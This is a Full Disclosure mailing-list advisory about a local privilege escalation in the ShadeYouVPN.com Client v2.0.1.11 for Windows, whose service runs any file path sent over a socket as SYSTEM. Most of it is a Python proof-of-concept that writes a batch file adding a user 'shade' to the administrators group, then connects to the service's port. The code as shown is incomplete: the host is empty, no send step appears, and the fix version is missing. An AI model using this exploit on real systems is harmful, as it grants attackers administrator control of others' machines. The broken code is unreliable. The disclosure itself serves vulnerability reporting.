[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation

# Exploit ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation
# Date: 14.02.2017
# Software Link: https://shadeyouvpn.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local

1. Description

`ShadeYou` service executes any file path send through socket without
verification as SYSTEM user.


2. Proof of Concept

import socket
import tempfile

print "ShadeYouVPN.com Client v2.0.1.11 for Windows Privilege Escalation"
print "by Kacper Szurek"
print "https://security.szurek.pl/";
print "https://twitter.com/KacperSzurek";

t = tempfile.TemporaryFile(delete=False, suffix='.bat')
t.write("net user shade /add\n")
t.write("net localgroup administrators shade /add")

s = socket.socket()
s.connect(("", 10295))

print s.recv(1024)
print s.recv(1024)

3. Solution

Update to version

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/